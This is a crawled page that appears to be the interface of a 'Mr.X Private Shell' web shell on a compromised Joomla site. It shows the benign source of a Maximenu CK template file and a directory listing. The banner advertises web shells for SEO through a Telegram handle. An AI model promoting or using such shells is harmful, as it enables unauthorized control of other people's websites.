__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @copyright Copyright (C) 2011-2020 Cedric KEIFLIN alias ced1870
* https://www.joomlack.fr
* Module Maximenu CK
* @license GNU/GPL
* */
// no direct access
defined('_JEXEC') or die('Restricted access');
// $close = '<span class="maxiclose">' . \Joomla\CMS\Language\Text::_('MAXICLOSE') . '</span>';
$orientation_class = ( $params->get('orientation', 'horizontal') == 'vertical' ) ? 'maximenuckv' : 'maximenuckh';
$direction = $langdirection == 'rtl' ? 'right' : 'left';
$start = (int) $params->get('startLevel');
?>
<div class="<?php echo $orientation_class . ' ' . $langdirection ?>" id="<?php echo $params->get('menuid', 'maximenuck'); ?>" >
<?php require dirname(__FILE__) . '/_mobile.php'; ?>
<ul<?php echo $microdata_ul ?> class="menu<?php echo $params->get('class_sfx'); ?> maximenuck"<?php
$tag = '';
if ($params->get('tag_id')!=NULL) {
$tag = $params->get('tag_id').'';
echo ' id="'.$tag.'"';
}
?>>
<?php
include dirname(__FILE__) . '/_logo.php';
$zindex = 12000;
foreach ($items as $i => &$item) :
$item->mobile_data = isset($item->mobile_data) ? $item->mobile_data : '';
$itemlevel = ($start > 1) ? $item->level - $start + 1 : $item->level;
// load a module
if (isset($item->content) AND $item->content) {
echo '<li data-level="' . $itemlevel . '" class="maximenuck maximenuckmodule' . $item->classe . ' level' . $item->level .' '.$item->liclass . '" ' . $item->mobile_data . '>' . $item->content;
$item->ftitle = '';
}
if ($item->ftitle != "") {
$title = $item->anchor_title ? ' title="'.$item->anchor_title.'"' : '';
$description = $item->desc ? '<span class="descck">' . $item->desc . '</span>' : '';
// manage HTML encapsulation
$item->tagcoltitle = $item->fparams->get('maximenu_tagcoltitle', 'none');
$classcoltitle = $item->fparams->get('maximenu_classcoltitle', '') ? ' class="'.$item->fparams->get('maximenu_classcoltitle', '').'"' : '';
$opentag = (isset($item->tagcoltitle) AND $item->tagcoltitle != 'none') ? '<'.$item->tagcoltitle.$classcoltitle.'>' : '';
$closetag = (isset($item->tagcoltitle) AND $item->tagcoltitle != 'none') ? '</'.$item->tagcoltitle.'>' : '';
// manage image
require dirname(__FILE__) . '/_image.php';
if ($params->get('imageonly', '0') == '1')
$item->ftitle = '';
echo '<li'. $microdata_li .' data-level="' . $itemlevel . '" class="maximenuck ' . $item->classe . ' level' . $item->level .' '.$item->liclass . '" style="z-index : ' . $zindex . ';" ' . $item->mobile_data . '>';
require dirname(__FILE__) . '/_itemtype.php';
}
// The next item is deeper.
if ($item->deeper) {
echo '<ul>';
}
// The next item is shallower.
elseif ($item->shallower) {
echo '</li>';
echo str_repeat('</ul></li>', $item->level_diff);
}
// The next item is on the same level.
else {
echo '</li>';
}
endforeach;
?></ul></div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| _image.php | File | 5.9 KB | 0664 |
|
| _itemtype.php | File | 2.69 KB | 0664 |
|
| _logo.php | File | 1.56 KB | 0664 |
|
| _mobile.php | File | 797 B | 0664 |
|
| default.php | File | 7.86 KB | 0664 |
|
| default.png | File | 21 KB | 0664 |
|
| dropselect.php | File | 762 B | 0664 |
|
| dropselect.png | File | 19.29 KB | 0664 |
|
| flatlist.php | File | 3.4 KB | 0664 |
|
| flatlist.png | File | 18.97 KB | 0664 |
|
| fullwidth.php | File | 6.79 KB | 0664 |
|
| fullwidth.png | File | 12.39 KB | 0664 |
|
| index.html | File | 31 B | 0664 |
|
| megatabs.php | File | 6.8 KB | 0664 |
|
| megatabs.png | File | 13.52 KB | 0664 |
|
| nativejoomla.php | File | 2.77 KB | 0664 |
|
| nativejoomla.png | File | 5.39 KB | 0664 |
|
| pushdown.php | File | 8.57 KB | 0664 |
|
| pushdown.png | File | 17.68 KB | 0664 |
|